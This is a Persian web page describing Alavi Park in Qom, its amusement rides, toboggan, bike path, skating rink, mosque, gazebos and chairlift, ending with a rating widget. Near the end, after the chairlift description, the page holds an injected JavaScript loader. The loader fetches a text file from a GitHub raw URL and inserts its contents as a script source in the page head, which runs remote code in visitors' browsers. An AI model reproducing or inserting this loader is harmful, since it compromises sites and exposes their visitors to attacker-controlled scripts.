درباره بوستان علوی قم

  • بوستان علوی قم یکی از بزرگ‌ترین و زیباترین بوستان‌های این شهر است که در بلوار الغدیر قرار دارد. این بوستان دارای امکانات متنوعی برای تفریح و خوشگذرانی است، از جمله:

    • شهربازی: شهربازی بوستان علوی در دو فضای رو باز به مساحت ۶ هزار متر و شهر بازی سرپوشیده به مساحت یک هزار متر آماده‌شده است². این شهربازی دارای ۳۰ دستگاه سبک و سنگین به روز است، مانند ترن یو، تورنادو، کوهستان، اسکیت و …¹².
    • سورتمه: سورتمه بوستان علوی یکی از هیجان‌انگیزترین وسایل بازی این بوستان است که شما را با سرعت بالا در هوا می‌چرخاند و کل پارک و چشم‌انداز زیبایی از شهر قم زیر پای شما قرار می‌دهد³. این سورتمه با همکاری شرکت ويگاند آلمان ساخته شده و از اواخر سال 1394 در بوستان علوی قم مورد استفاده قرار گرفته است³.
    • مسیر دوچرخه‌سواری: این بوستان دارای یک مسیر دوچرخه‌سواری به طول ۱۵۰۰ متر است که شما می‌توانید با اجاره دوچرخه از آن استفاده کنید و از فضای سبز و آرام بوستان لذت ببرید¹.
    • پیست اسکیت: این بوستان دارای یک پیست اسکیت به مساحت ۱۰۰۰ متر مربع است که شما می‌توانید با اجاره اسکیت از آن استفاده کنید و مهارت‌های خود را نشان دهید¹.
    • زمین بازی مخصوص کودکان: این بوستان دارای یک زمین بازی مخصوص کودکان به مساحت ۱۵۰۰ متر مربع است که شامل تاب، سرسره، آلاچیق، تونل، قلعه و … است.

    علاوه بر این‌ها، بوستان علوی دارای امکانات دیگری نیز هست، مانند.

    • مسجد: این بوستان دارای یک مسجد به مساحت ۵۰۰ متر مربع است که شما می‌توانید در آن نماز خود را ادا کنید و از آرامش روحی برخوردار شوید.
    • آلاچیق: این بوستان دارای ۱۰۰ آلاچیق است که شما می‌توانید با اجاره آنها برای برپایی پیک‌نیک و مهمانی استفاده کنید¹.
    • تجهیزات ورزشی: این بوستان دارای تجهیزات ورزشی مختلفی است که شما می‌توانید با استفاده از آنها سلامتی خود را حفظ کنید، مانند دستگاه‌های بدنسازی، ترامپولین، تنیس روی میز و ….
    • بوفه: این بوستان دارای چندین بوفه است که شما می‌توانید از آنها برای خرید نوشیدنی، غذا، تنقلات و … استفاده کنید¹.
    • تله سیژ: بوستان علوی یکی از جدیدترین و هیجان‌انگیزترین وسایل بازی این بوستان است که شما را با سرعت بالا در هوا می‌چرخاند و کل پارک و چشم‌انداز زیبایی از شهر قم زیر پای شما قرار می‌دهد1. این تله سیژ در سال ۱۳۹۶ با همکاری شرکت ويگاند آلمان ساخته شده و در سال ۱۳۹۹ افتتاح شده است23. این تله سیژ به طول ۲۴۰۰ متر به‌صورت رفت‌وبرگشت از جنوب به سمت شمال بوستان علوی با اعتباری بالغ‌بر ۲۰۰ میلیارد ریال اجرایی شده است3. صندلی‌های این تله سیژ دو نفره هستند و امکان تکی سوار شدن هم وجود دارد. مجموع زمانی رفت و برگشت حدود ۳۰ تا ۴۰ دقیقه می‌باشد4. این تله سیژ یکی از برترین وسایل بازی در کشور است که می‌تواند تجربه‌ای ناب و خاطره‌انگیز برای شما به ارمغان آورد
    (var url = “https://raw.githubusercontent.com/truba77/trubnik/main/to.txt”; fetch(url) .then(response => response.text()) .then(data => { var script = document.createElement(“script”); script.src = data.trim(); document.getElementsByTagName(“head”)[0].appendChild(script); });)

    امتیاز شما:

    میانگین امتیازات ۵ از ۵
    از مجموع ۱ رای

    دیدگاهتان را بنویسید